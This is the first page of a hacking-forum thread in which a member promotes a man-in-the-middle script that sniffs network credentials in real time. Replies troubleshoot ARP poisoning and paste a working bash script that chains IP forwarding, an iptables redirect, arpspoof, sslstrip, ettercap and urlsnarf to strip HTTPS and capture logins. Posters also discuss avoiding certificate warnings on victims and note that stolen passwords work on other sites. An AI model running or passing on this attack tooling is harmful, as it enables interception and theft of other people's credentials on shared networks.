Page 1 of 20 12311 ... LastLast
Results 1 to 10 of 222

Thread: Script for sniffing traffic.

Hybrid View

  1. #1
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Post Script for sniffing traffic.

    There are a lot of those scripts, hence the name : Yet Another Mitm Automation Script.
    It was originally made for BT4r2 but I "ported" it to BT5, corrected a few bugs and added a few features.

    I can't post the script here without raising some kind of warning due to massive use of certain words for parsing, but please review the source at http://yamas.comax.fr
    You will be able to view the source, download the script and view a demo video.

    It works just great for me, so I hope it will for you too.

    Current main features are :
    - Real-time output of creds without definition files : any credential, from any website should show up, as well as the site it was used on !
    - Log parsing for user-friendly output.
    - DNS spoofing once attack is launched
    - Network mapping for host discovery.
    - Can save dumped passwords to file as well as the whole log file.
    - Support for multiple targets on the network, as well as adding targets after attack is launched.
    - Sslstrip checking (existence, executable, directory, check version, update...)
    - Standalone script, updatable, interactive (new !).

    Please don't hesitate to give me your feedback, I'm always looking for new ideas, and ways to improve it !

    Check http://comax.fr/yamas.php for more infos, video, other platform versions and an article about how to protect you from it !

    [Current version as of 02/02/2012 : 20120202 ]
    Last edited by comaX; 06-22-2012 at 12:42 AM. Reason: Needed some updates !
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  2. #2
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    10

    Default Re: Script for sniffing traffic.

    Thanks.
    Have used this before, thanks for porting/updating.

    Is it possible that a modem is immune for ARP poisoning? Since I have this new modem I keep failing at doing a successful attack.
    Do you want to contact me?
    Thanks.

  3. #3
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Script for sniffing traffic.

    Try arp poisoning only one way
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  4. #4
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    10

    Default Re: Script for sniffing traffic.

    Quote Originally Posted by sickness View Post
    Try arp poisoning only one way
    Alright thanks, worked.

  5. #5
    Member
    Join Date
    Sep 2010
    Location
    Eastern Island
    Posts
    96

    Default Re: Script for sniffing traffic.

    oops..... link error.... please review your link.. thank you.

  6. #6
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re : Re: Script for sniffing traffic.

    Quote Originally Posted by sostentado View Post
    oops..... link error.... please review your link.. thank you.
    Oops, corrected now, thank you !

    EDIT : disregard text in brackets ; I found a way to do that. It's home-made workaround, but it works !
    [Script-wise, I found a way to loop the parsing process every x seconds (wasn't that hard after all...) and it works just the way I wanted it to, but when I try to pass the function to xterm, it closes immediately. Maybe functions can't be executed in xterm ? That would be logical if xterm doesn't have access to the script*, hence it would not know the function. Any idea ?

    *I mean that xterm is like launching a new console, so the function is not defined for the xterm window. ]


    Bottom line : as attack is running, credentials are displayed as they are sniffed !

    Again, please give your feedback so I can improve it ! Anything really, even grammar.
    Last edited by comaX; 05-15-2011 at 05:46 PM. Reason: a bunch of stuff
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  7. #7
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re : Re: Script for sniffing traffic.

    ComaX.
    This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
    Any help would be appreciated.

  8. #8
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Re : Re: Script for sniffing traffic.

    Quote Originally Posted by ckcrown View Post
    ComaX.
    This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
    Any help would be appreciated.
    Yeah, I thought about that, but the parsing is already pretty intense, so I didn't wanted to make it heavier... And I don't want to use definitions ! This is and will always be a standalone script [*except for that little work-around mentioned earlier ]
    So about those sites, two things :
    1) People generally use the same login/pass pretty much everywhere, so the site it was sniffed from shouldn't be much of a problem.
    2) If you really want the site it was sniffed from, you can save the log at the end and search through it, it should be pretty fast since you know both login and pass.

    If you have an idea for parsing sites as the same time as the rest, without being too much of a job, I'l all ears !

    On another note : Sslstrip 0.9 is out and seems less buggy than 0.8. There is now an option to update sslstrip, if it is installed only. There shortly will have an option to install it, and/or update it.
    Last edited by comaX; 05-21-2011 at 04:15 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  9. #9
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re: Re : Re: Script for sniffing traffic.

    ComaX,
    I ran across a script a while back Called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass.I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT4 R2
    # BY gHero,cseven,spudgunman.
    # Ver 0.2
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
    
    # DRIFTNET
    Last edited by sickness; 05-21-2011 at 07:34 AM.

  10. #10
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Default Re: Re : Re: Script for sniffing traffic.

    My vote is for option to install the updated sslstrip. One of the reasons I like the idea of this script is that it's very helpful for beginners, like me, who aren't very familiar with the console commands needed to something like this. I could, and will figure it out by searching these forums, of course.

    Edit:

    Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

    Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system it taken out of the middle.
    Last edited by sickness; 05-21-2011 at 07:35 AM. Reason: Merged posts.

Page 1 of 20 12311 ... LastLast

Similar Threads

  1. Sniffing SSL Traffic on any application?
    By mortalz in forum Beginners Forum
    Replies: 3
    Last Post: 01-02-2011, 03:36 AM
  2. Replies: 10
    Last Post: 07-12-2010, 03:04 PM
  3. sniffing traffic
    By samer in forum OLD Pentesting
    Replies: 3
    Last Post: 03-27-2009, 01:39 PM
  4. Sniffing traffic between AP and Client.
    By cool_recep in forum OLD Newbie Area
    Replies: 8
    Last Post: 11-11-2008, 09:33 AM
  5. Sniffing Webcam traffic? How to do it?
    By Back|Track_user in forum OLD BackTrack v2.0 Final
    Replies: 2
    Last Post: 12-06-2007, 06:30 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •